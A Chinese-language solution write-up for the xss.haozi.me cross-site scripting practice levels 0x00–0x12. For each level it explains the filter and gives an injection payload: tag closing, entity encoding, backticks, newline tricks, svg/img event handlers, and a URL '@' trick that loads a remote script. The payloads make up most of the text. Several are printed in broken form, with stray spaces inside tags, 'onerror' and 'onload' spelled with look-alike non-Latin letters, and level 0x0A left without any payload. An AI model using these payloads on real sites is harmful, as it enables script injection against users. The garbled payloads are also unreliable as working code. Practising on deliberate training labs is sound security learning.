xss.haozi.me练习通关

0x00

这一关也没有啥限制，就直接输出就可以了

< script>alert(0)< /script >

0x01

这一关的输出是在< textarea >标签里面的，但是这个标签只能输入文本，所以只能先将标签闭合，然后进行弹窗。

< /textarea>< script>alert(1)< /script>< textarea>

0x02

这个就是将input标签先闭合上，然后再进行输入弹窗就可以了。

aaa">< script>alert(1)< /script>

0x03

这一关是将括号给过滤掉了，也就是说alert()的括号不可以直接打印出来，所以这里可以采用两种方式，一种是编码的形式，另一种就是使用反引号来代替括号。

< script>alert& #40;1& #41;< /script>
< script>alert``1`< /script>

0x04

这一关和上一关相同，但是它把反引号也过滤了，所以就只能使用编码的方式了。

< script>alert& #40;1& #41;< /script>

0x05

这一关将注释符号（–>）过滤成了一个笑脸的表情，但是我们又需要把注释给闭合上，所以可以使用另一种注释的符号（–!>）

–!>< script>alert(1)< /script><!–

0x06

这里将auto或者on过滤成了_，并且是在input标签输出，所以这里可以将type的值改成imge的形式进行输出，并且使用换行的方式来停止以on开头=结尾变成_。

type="image"src=1 onerror
=alert(1)

0x07

这一关过滤了标签符号，所以没有办法写标签，也没有办法闭合。但是html中img标签是可以不写后面的“>”,因为它有一种纠错机制，

<img type=“image” src=1 οnerrοr=alert(1)//

0x08

这一关限制了不可以对style标签进行闭合，一旦出现< /style>会转变为“坏人”，但是html中将标签换行也是可以识别的，所以可以换行处理标签。

</style

< script>alert(1)< /script>
< style

0x09

这一关必须以https://www.segmentfault.com为开头，否则不能输入，然后就将script标签闭合在写点击事件就可以了。

https://www.segmentfault.com">< /script><svg/οnlοad=alert(1)< script>

0x0A

这里可以使用@的小技巧。
以@分隔的话前面表示的是用户名和密码，后面表示的是登录的网站和端口，也可以以表示重定向到第二个网站。

0x0B

这里用到了将所有字母转大写。可以使用编码来转换。

< svg/οnlοad=& #97;& #108;& #101;& #114;& #116;(1)>

0xC

这一关过滤了script，并且将字母转为大写。可以使用编码来进行。

<svg/οnlοad=& #97;& #108;& #101;& #114;& #116;(1)>

0x0D

这关过滤了斜杠，但是要闭合注释，所以和使用换行的方式。

alert(1)
–>

0x0E

这关和第10关很解法相似，都是指定到其他地方进行调转。

https://[email protected]/te.js

0x0F

将src闭合，然后写弹窗，然后将后面注释

aaa’),alert(1)//

0x10

这里就是直接输入，所以可以直接输入

alert(1)

0x11

这关将一些字符转换了，也是先将那个闭合，然后进行弹窗。

"),alert(1)//

0x12

这一关将"过滤成了"，所以可以使用转义符号将先将\转义，就会有耽误了。

"),alert(1)//